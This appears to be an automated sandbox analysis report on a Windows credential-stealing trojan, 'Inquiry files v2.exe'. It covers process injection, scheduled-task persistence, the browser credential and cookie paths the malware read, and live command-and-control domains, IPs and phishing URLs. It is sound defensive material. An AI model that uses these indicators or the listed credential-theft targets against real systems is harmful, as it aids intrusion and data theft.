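    return {"commands": commands, "triggers": triggers, "intervals": intervals,
            "run_level": run_level, "hidden": hidden, "findings": findings}


if __name__ == "__main__":
    for key, value in triage_task_xml(SAMPLE_TASK_XML).items():
        print(f"{key:>10}: {value}")
```

On a live host the same check can be run against the output of schtasks /Query /XML /TN "Updates\WOzeoJQi", which yields the registered definition even after the temporary XML in AppData\Local\Temp has been deleted.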

                Stealing of Sensitive Information

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.WOzeoJQi.exe.27bdc94.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.7630000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.2f9dc88.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\runas.exe | File opened (Chromium credential, cookie and autofill databases, plus Local State, which carries the DPAPI-wrapped key that decrypts them):
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runas.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ (the Outlook MAPI profile store, where mail account settings and stored credentials live)

                Remote Access Functionality

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.WOzeoJQi.exe.27bdc94.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.7630000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.2f9dc88.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix (techniques grouped by tactic; a number in parentheses is the count the report shows beside that technique):
• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
• Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
• Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
• Privilege Escalation: Process Injection (512); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
• Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (512); Deobfuscate/Decode Files or Information (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1)
• Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
• Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
• Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
• Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1475661; Sample: Inquiry files v2.exe; Start date: 18/07/2024; Architecture: WINDOWS; Score: 100

Start (node 2)
• DNS/IP: www.techacademy.store; www.scottifqqy.online; 4 other IPs or domains
• Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 12 other signatures
• Started: Inquiry files v2.exe 7 (node 10); WOzeoJQi.exe 5 (node 14)

Inquiry files v2.exe 7 (node 10)
• Dropped: C:\Users\user\AppData\Roaming\WOzeoJQi.exe (PE32); C:\Users\...\WOzeoJQi.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp35FF.tmp (XML); C:\Users\user\...\Inquiry files v2.exe.log (ASCII)
• Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
• Started: RegSvcs.exe (node 16); powershell.exe 23 (node 19); schtasks.exe 1 (node 21)

WOzeoJQi.exe 5 (node 14)
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
• Started: schtasks.exe 1 (node 23); RegSvcs.exe (node 25)

RegSvcs.exe (node 16)
• Signatures: Maps a DLL or memory area into another process
• Injected: YIJBuAgnqfKMtZ.exe (node 27)

powershell.exe 23 (node 19)
• Signatures: Loading BitLocker PowerShell Module
• Started: WmiPrvSE.exe (node 31); conhost.exe (node 33)

schtasks.exe 1 (node 21)
• Started: conhost.exe (node 35)

schtasks.exe 1 (node 23)
• Started: conhost.exe (node 37)

YIJBuAgnqfKMtZ.exe (node 27)
• DNS/IP: www.scottifqqy.online, 185.179.189.181, ports 49726, 80, WEBHOST1-ASRU, Russian Federation; ancuapengiu28.com, 172.96.191.69, ports 49727, 49729, 49730, LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG, Canada; 2 other IPs or domains
• Signatures: Found direct / indirect Syscall (likely to bypass EDR)
• Started: runas.exe 13 (node 39)

runas.exe 13 (node 39)
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
• Started: firefox.exe (node 42)

Source | Detection | Scanner | Label
Inquiry files v2.exe | 66% | ReversingLabs | Win32.Trojan.Leonem
Inquiry files v2.exe | 48% | Virustotal | -
Inquiry files v2.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\WOzeoJQi.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\WOzeoJQi.exe | 66% | ReversingLabs | Win32.Trojan.Leonem
C:\Users\user\AppData\Roaming\WOzeoJQi.exe | 48% | Virustotal | -
                No Antivirus matches
Source | Detection | Scanner | Label
goodneighbor.club | 0% | Virustotal | -
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://www.techacademy.store/cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | -
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal | -
https://duckduckgo.com/ac/?q= | 0% | Virustotal | -
http://tempuri.org/AppRepairsDataSet.xsdkNo | 0% | Avira URL Cloud | safe
http://tempuri.org/AppRepairsDataSet.xsdkNo | 1% | Virustotal | -
http://www.goodneighbor.club/qt04/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.techacademy.store/cf3x/ | 0% | Avira URL Cloud | safe
http://www.ancuapengiu28.com/d3vb/ | 0% | Avira URL Cloud | safe
http://www.goodneighbor.club | 0% | Avira URL Cloud | safe
http://tempuri.org/AppRepairsDataSet.xsd | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | -
http://tempuri.org/AppRepairsDataSet.xsd | 1% | Virustotal | -
http://www.goodneighbor.club/qt04/ | 1% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.scottifqqy.online | 185.179.189.181 | true | true | - | unknown
ancuapengiu28.com | 172.96.191.69 | true | true | - | unknown
www.techacademy.store | 13.248.169.48 | true | true | - | unknown
goodneighbor.club | 162.159.134.42 | true | false | - | unknown
www.goodneighbor.club | unknown | unknown | true | - | unknown
www.ancuapengiu28.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.techacademy.store/cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= | true | Avira URL Cloud: safe | unknown
http://www.goodneighbor.club/qt04/ | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.ancuapengiu28.com/d3vb/ | true | Avira URL Cloud: safe | unknown
http://www.techacademy.store/cf3x/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://tempuri.org/AppRepairsDataSet.xsdkNo | Inquiry files v2.exe, WOzeoJQi.exe.0.dr | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Inquiry files v2.exe, 00000000.00000002.2222224307.0000000003027000.00000004.00000800.00020000.00000000.sdmp; WOzeoJQi.exe, 00000009.00000002.2482574728.00000000027F9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | Inquiry files v2.exe, WOzeoJQi.exe.0.dr | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodneighbor.club | YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/AppRepairsDataSet.xsd | Inquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp; WOzeoJQi.exe, 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.techacademy.store | United States | 16509 | AMAZON-02US | true
162.159.134.42 | goodneighbor.club | United States | 13335 | CLOUDFLARENETUS | false
172.96.191.69 | ancuapengiu28.com | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
185.179.189.181 | www.scottifqqy.online | Russian Federation | 44094 | WEBHOST1-ASRU | true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1475661
                          Start date and time:2024-07-18 07:55:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 22s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Inquiry files v2.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@20/12@4/4
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 211
                          • Number of non-executed functions: 291
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:56:45 | API Interceptor | 1x Sleep call for process: Inquiry files v2.exe modified
01:56:53 | API Interceptor | 15x Sleep call for process: powershell.exe modified
01:56:56 | API Interceptor | 1x Sleep call for process: WOzeoJQi.exe modified
01:58:20 | API Interceptor | 101479x Sleep call for process: runas.exe modified
07:56:55 | Task Scheduler | Run new task: WOzeoJQi path: C:\Users\user\AppData\Roaming\WOzeoJQi.exe
Context by IP (Match; then Associated Sample Name / URL | Detection | Threat Name | Context)
Match: 13.248.169.48
• nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer | www.techacademy.store/cf3x/
• SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exe | malicious | FormBook, PureLog Stealer | www.ansverity.com/7llb/
• OrderPI.exe | malicious | FormBook | www.cetys.com/6uii/
• PO HA25622.exe | malicious | FormBook | www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
• IMG_00110724.exe | malicious | FormBook | www.ansverity.com/7llb/
• SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exe | malicious | FormBook | www.ansverity.com/7llb/
• Shipping Documents.exe | malicious | FormBook | www.ansverity.com/7llb/
• PTT Group project - Quotation.exe | malicious | FormBook | www.webuyfontana.com/cns4/
• 80TeZdsbeA6B6j4.exe | malicious | FormBook | www.realtors.biz/mc10/?ejn=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/XlvHoWwQQ/&vVjLC=M6Ah
• RFQ - MK FMHS.RFQ.24.101.exe | malicious | FormBook | www.webuyfontana.com/cns4/
Match: 162.159.134.42
• nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer | www.goodneighbor.club/qt04/
• Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | www.goodneighbor.club/arws/
• CC-CREDIT CARD-itineraries.exe | malicious | FormBook | www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
• http://heritageconsultants.com | malicious | Unknown | heritageconsultants.com/
• http://www.heritageconsultants.com/ | malicious | Unknown | www.heritageconsultants.com/
• http://www.standardmediaindex.com | malicious | Unknown | www.standardmediaindex.com/
• sCzFNAYGKI.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader | redrivergorge.com/admin
• 3yPvcmrbqS.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz | directa-plus.com/administrator/
• Documents.exe | malicious | FormBook | www.shufiya.com/gd12/?DPZl=5jUDTf-HoZs&R0Gh=4IUdDy7qYcz3Aj6r2+dL3f372ATDValOWy994H4bQvMIP2krqm+IJVbZ16vdXjwxdhOF
• php.ini | malicious | Unknown | thefortcollins.dentist/

Context by domain (Match; then Associated Sample Name / URL | Detection | Threat Name | Context)
Match: www.techacademy.store
• nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer | 13.248.169.48
Match: www.scottifqqy.online
• nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer | 185.179.189.181

Context by ASN (Match; then Associated Sample Name / URL | Detection | Threat Name | Context)
Match: AMAZON-02US
• https://xx0q9nhk.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6IjMwNWQxN2YxLWY1ZTEtNDRkYS1hN2E0LWM2YjE2MTJjNWZkOSIsImNlbGwiOiJodHRwczovL3V0MHA3amg4NGUuZXhlY3V0ZS1hcGkuZXUtY2VudHJhbC0xLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiNjk5MzNmOWUtZmJiMi00MjI4LWEwOWQtZTc1NzIwMzY1YTk4IiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiZGlyZWN0X2RlbGl2ZXJ5IjpmYWxzZSwiaWF0IjoxNzIxMjI3NzMxLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MjkwMDM3MzF9.mEP04G0-kO-9MsdDefUe4ZVgMaMzr6MSQ3lnuxDMHKw/1/01020190c12ae356-bb55d2f5-f1fd-4782-b5c7-38db77e0f19a-000000/yvFQgo7_34DVm6G1DTW8hgWNVMI=383 | malicious | Unknown | 34.241.119.134
• file.exe | malicious | Unknown | 143.204.215.105
• http://pdkwh.qqddos.cc/4fBJLd13332YTqI371yeiygsooro15197JNRCWECRQQSOABW2364JOKX15627E17 | malicious | Unknown | 18.192.71.245
• file.exe | malicious | Unknown | 143.204.215.122
• file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar | 143.204.215.122
• SecuriteInfo.com.decompression.bomb.9781.1949.exe | malicious | Unknown | 108.139.47.108
• file.exe | malicious | Unknown | 143.204.215.105
• file.exe | malicious | Unknown | 143.204.215.105
• file.exe | malicious | Unknown | 143.204.215.105
• file.exe | malicious | Unknown | 143.204.215.122
Match: CLOUDFLARENETUS
• rASoAfQNeEF5VDs.exe | malicious | FormBook, PureLog Stealer | 172.67.187.202
• https://CqRnNkhSNO.vk.com/away.php?to=https://farmkidbrand.com/H_qceDTb49iDAGcmuYsWWQ==:o6u15VOqNL2aoHo37RxruyOlPy6TYrNJ-YTuitS3qkQoJvm5K9y2Gc6UL1GsS69tqS_ncyfuytk_ZdTo_EwEQB83_GaFtk0gkxd9YmGhWNZCN9RJHzOU6xC_tMGqMFfOV7Ld9QzNCUUkrckmMcfTP7sjSt8IQkjkk2f1Qmhfy2gtAszBHOnxkkFWSTE0k0-j3l9iEpnhcFJUi2nKF-PsUOtf02Q=#xYWRtaW5Ac3Bpcml0dHJ1Y2tsaW5lcy5jb20=&c=E,1,As5fs8LhE24Di_funLT9Ea4B5ozi609Y19huEYa6Ys2F9KLKEeLK8e8HovAnFunC0lvwIdCok_aD1uvQea9oN3giC8f1j5FYzU5-LCY6Up0,&typo=1 | malicious | HTMLPhisher | 188.114.96.3
• http://iffashionenterprise.com/liveparty | malicious | HTMLPhisher | 188.114.97.3
• 42ZjBoAnX1.rtf | malicious | FormBook | 188.114.97.3
• http://pdkwh.qqddos.cc/4fBJLd13332YTqI371yeiygsooro15197JNRCWECRQQSOABW2364JOKX15627E17 | malicious | Unknown | 104.16.119.9
• https://hresourcinfo.henryscchein.com/?o4i8h=ZR | malicious | Unknown | 1.1.1.1
• SecuriteInfo.com.decompression.bomb.9781.1949.exe | malicious | Unknown | 188.114.96.3
• https://lunchpartybowl.info | malicious | HTMLPhisher | 104.21.91.157
• https://www.google.com/url?rct=j&sa=t&url=https://www.ufrpe.br/%3Fblank%3D20240717bet%2520estrela%2520da%2520sorte.html&ct=ga&cd=CAEYBCoTNTEwMjQ0ODI4MTc1MzY4MDM2ODIdM2FjMjZmOWJlMDlmMzdlMDpjb20uYXU6ZW46QVU&usg=AOvVaw1mvSPSrHAnx3XZENtwvD5z | malicious | Unknown | 188.114.96.3
• http://7.rcestershir.com/ | malicious | Unknown | 188.114.97.3
Match: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
• nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer | 172.96.191.69
• Your file name without extension goes here.exe | malicious | FormBook | 209.58.164.109
• HSBC Bank_Approvel Letter.exe | malicious | FormBook | 209.58.164.109
• https://103.150.10.45:8443/ | malicious | Unknown | 103.150.10.45
• PHHOjspjmp.exe | malicious | CMSBrute | 209.58.180.90
• FEB-MAR SOA 2024.exe | malicious | AgentTesla | 172.96.191.121
• YHZj3QW0oh.exe | malicious | Remcos | 23.106.121.144
• w0vFb4jHKs.exe | malicious | Remcos | 23.106.121.144
• CITIBANK EUROPE PLC. SWIFT TRANSFER (008) CMSWT24019000690.exe | malicious | Remcos | 23.106.121.133
• Swift copy of payment.exe | malicious | Remcos | 23.106.121.133
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1730
                          Entropy (8bit):5.35299682261553
                          Encrypted:false
                          SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMRbHKnHKU57Uivj:Pq5qHwCYqh3oPtI6eqzxqqMRbqnqU57n
                          MD5:B0DF99A47CF8612EF42E4C30907F5CAD
                          SHA1:9C53411244A7810D704C743BA3E13DCA77839074
                          SHA-256:97B250764E2328216E67001A7C6B207A74BDD90782669639C6469634DAB5DE58
                          SHA-512:8A9A273E145414FC578426B6BF7D1A52DAF9842FB81C8886D2200674E4ED8CCDADA5A7259A915A1685BAB5BDACDE2DF2DF0E06B105D60D7A7E5B85305C2E7FC7
                          Malicious:true
